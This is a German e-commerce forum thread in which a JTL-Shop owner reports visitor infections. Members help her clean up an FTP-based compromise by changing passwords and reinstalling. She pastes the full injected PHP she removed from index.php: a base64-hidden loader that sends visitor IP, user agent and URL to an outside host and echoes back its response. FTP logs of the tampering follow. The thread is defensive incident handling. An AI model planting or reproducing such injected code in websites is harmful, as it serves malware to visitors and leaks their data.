Probleme mit Malware . . .

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
Hallo,

habe von einer Kundin gestern morgen folgende Mitteilung erhalten:

> Vielen Dank für die Zusendung des Kleids und der anderen Teile.
> mir ist aufgefallen, dass ich nach Besuch Ihrer Website sogenannte
> Malware
> (Trojaner) auf meinem Computer hatte. Nach Bereinigung durch meinen
> IT-Fachmann, hatte ich sofort wieder die gleichen Trojaner auf meinem
> Computer, als ich auf Ihre Website ging. Könnten Sie Ihre Seite bitte
> überprüfen lassen, da anscheinend jemand dort bösartige Software
> versteckt hat.
> Gibt es eine Möglichkeit, seitens HostEurope meine Daten zu scannen?
> Vielen Dank für eine schnelle Rückmeldung und viele Grüße
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Auf Anfrage teilte mir Hosteurope dann folgendes mit:

In der index.php findet sich ab Zeile 178/179 etwas seltsamer Code. Zumindest gibt es base64-codierten Quelltext welcher hier vermutlcih nicht hingehört. Innerhalb dieses Codes wird ab

http://botstatisticupdate.com/stat/stat.php

zugegriffen (Zeile 190). Wenn Ihnen diese Domain nichts sagt, ist das vermutlich der Schadcode.

Wir haben Ihnen die FTP-Logfileauszüge der letzten 7 Tage in das Root Verzeichnis Ihres Webpacks gelegt. Sie können diese Daten per FTP abrufen.
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Wenn dieser Link da nicht hingehört - wo kommt der her und kann ich den einfach in der index.php löschen, ohne dass er wieder auftaucht?
 

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.085
217
Erkelenz
AW: Probleme mit Malware . . .

Du solltest deine FTP-Passwörter ändern. Möglicherweise kam es über diesen Weg.

Auf jeden Fall gehört dieser Code NICHT in die Datei und sollte sofort entfernt werden!
 

Freaky

Sehr aktives Mitglied
7. Mai 2009
1.331
104
AW: Probleme mit Malware . . .

Was sagt denn der Shopdateien-Check? Der müsste doch da was festgestellt haben oder?
 

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
AW: Probleme mit Malware . . .

Nee, der hat nichts außergewöhnliches entdeckt.
Ich habe jetzt folgenden Code aus der index.php entfernt:

<?phpif (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Und die log-Datei von Hosteurope zeigte mir folgendes an:

Auszug der Transferlogs zum FTP-Account 1160504:
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:06 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:07 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:24 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:25 +0200] "-"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:26 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:27 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:28 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:29 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
Klicke in dieses Feld, um es in vollständiger Größe anzuzeigen.

Betrifft also unsere beiden Shops - wer bitte ist "softlayer"?
 

ag-websolutions.de

Sehr aktives Mitglied
29. Dezember 2009
14.548
233
AW: Probleme mit Malware . . .

ich würde es nicht bei einer Bereinigung der index.php belassen....

sichere die config.ini.php und das template-verzeichnis und setze den shop neu auf ...

wenn nämlich in anderen dateien noch schadcode steckt ... ist dein shop ratz fat wieder infiziert

denke auch daran sämtliche Kennwörter zu ändern (shop-datenbank, ftp-zugang, shop-admin)
 
Du musst Dich einloggen oder registrieren um hier antworten zu können.
Ähnliche Themen
Titel Forum Antworten Datum
Probleme mit Artikelansicht oder Verkauf, etc. JTL-Wawi 2.0 0
Probleme mit Worker und JTL-App JTL-Wawi 2.0 5
Neu Probleme mit Import Datenbank vom Server auf lokal JTL-Wawi 2.0 User helfen Usern - Fragen zu JTL-Wawi 4
Häufiges Aufhängen - vermutlich Probleme mit der Datenbank JTL-Wawi 2.0 13
Neu Probleme mit Ninepoint und TikTok Shop Schnittstellen Import / Export 6
Probleme mit JTL Worker JTL-Wawi 2.0 1
Neu Probleme mit Inaktive Verkaufskanäle User helfen Usern - Fragen zu JTL-Wawi 0
Lizenzserver Probleme JTL-Wawi 1.11 11
Neu Google Ads probleme Betrieb / Pflege von JTL-Shop 1
Probleme beim Shopify-Abgleich: Artikel trotz erfolgreichem Abgleich nicht in Shopify auffindbar JTL-Wawi 1.11 1
Neu Probleme beim Erstellen von Artikeln aus Angeboten von eBay User helfen Usern - Fragen zu JTL-Wawi 1
Neu Probleme beim Mailversand User helfen Usern 0
Probleme bei der Verbindung zur Datenbank JTL-Wawi 2.0 12
Neu JTL2DATEV Buchungsdatenservice Probleme User helfen Usern - Fragen zu JTL-Wawi 0
Neu Immer wieder Probleme beim Abgleich, hängt löscht was auch immer Shopify-Connector 0
Neu Shop 5.6.1: Probleme beim Entfernen von Artikeln aus dem Warenkorb JTL-Shop - Fehler und Bugs 5
Fehler mit Zahlungsabgleich JTL-Wawi 1.11 6
Eigener Drittshop-Connector (jtl/connector 5.3): valide Variationskombinationen werden mit „besitzt keine Variationen" nicht gesendet JTL-Wawi 1.11 1
Neu Problem mit dem JTL-Connector – Invalid Shopify connection credentials. Shopify-Connector 3
Neu Arbeiten mit Lieferanten EKs - Workflows und SQL User helfen Usern - Fragen zu JTL-Wawi 5
Neu JTL Artikelanlage mit KI beschleunigen User helfen Usern - Fragen zu JTL-Wawi 1
Neu DHL 4.0 mit JTL-ShippingLabels funktioniert nicht JTL-ShippingLabels - Fehler und Bugs 2
Neu Amazon FBA Bestellungen doppelt mit _1 Amazon-Anbindung - Fehler und Bugs 3
Fehler beim Abgleich mit Amazon JTL-Wawi 2.0 10
Abgleich Amazon mit Fehlern beendet 1.11.08 JTL-Wawi 1.11 14
Rabatt Coupons in Verbindung mit Staffelpreisen - JTL 1.11.9, JTL Shop JTL-Wawi 1.11 0
Worker 2.0 starten mit deak. Abgleichen? JTL-Wawi 2.0 3
Fehler beim Abgleich mit dem JTL-Shop JTL-Wawi 2.0 12
Neu OnFinds: KI-Suche für JTL-Shop mit fairer Abrechnung nach Artikelanzahl. 30 Tage kostenlos testen Plugins für JTL-Shop 0
Neu Abrechnung / Auslieferung von Aufträgen mit Gutschriftverfahren Arbeitsabläufe in JTL-Wawi 3
Neu Dummy-ID oder Freiposition für Angebot mit mehrzeiliger Beschreibung JTL-Wawi - Ideen, Lob und Kritik 1
Neu JTL Shop 5.7.1 mit Fehlern - versandarten zahlungsarten nicht änderbar, leere weiße Seite JTL-Shop - Fehler und Bugs 5
JTL Ameise Lieferantenbestellung mit VPE importieren oder umrechnen JTL-Wawi 1.11 0
Jtl pos Einstellungen mit wiwa 2.02 JTL-Wawi 1.11 0
Anmeldung mit OAuth bei Versanddienstleister notwendig JTL-Wawi 1.10 5
Problem mit Hermes Österreich Sendungsnummern – Fehler beim Amazon-Abgleich in JTL-Wawi JTL-Wawi 1.10 0
Bestellabgleich mit JTL Wawi und WooCommerce 1h verzögert JTL-Wawi 2.0 0
Neu PayPal Käufername stimme nicht mit Liederadresse überein! Business Jungle 0
Neu 1.11.8 Auftagsimport mit Artikelnummern mapping JTL-Ameise - Fehler und Bugs 0
Neu Neuerdings E-Mail benachrichtigung bei "Pick up in Store", allerdings mit E-Mail "Bestellung wurde abgeholt" Shopify-Connector 0
Neu Abgleich mit Amazon Sendungsnummer / Rechnung Arbeitsabläufe in JTL-Wawi 0
Neu JTL-Wawi mit Claude, ChatGPT, Openclaw/Hermes oder CRM System verbinden User helfen Usern 2
Neu Custom Checkout - Conversion optimiert mit Speicherung von Standard-Versandart und Zahlungsart am Kunden JTL-Shop - Ideen, Lob und Kritik 1
Neu Auftrag - Lieferstatus mit Workflow exportieren Arbeitsabläufe in JTL-Wawi 3
In Diskussion Workflow mit UND / ODER - Bedingung erstellen JTL-Workflows - Ideen, Lob und Kritik 7
Ameise-Export: Umsatzsteuer stimmt nicht mit Differenz aus Netto und Brutto überein (insbesondere bei mehreren Steuersätzen) JTL-Wawi 1.11 0
Neu Klarna konnte mit den angegebenen Daten keine Sitzung erstellen. Einige Feldbedingungen wurden verletzt. Betrieb / Pflege von JTL-Shop 0
Neu Funktioniert Shop 5.7 mit MariaDB 10.5.29? Installation / Updates von JTL-Shop 1
Sanktionsprüfung mit JTL JTL-Wawi 1.10 0
Versandart Standartpaketversand mit Express JTL-Wawi 1.10 2

Ähnliche Themen

Top Bottom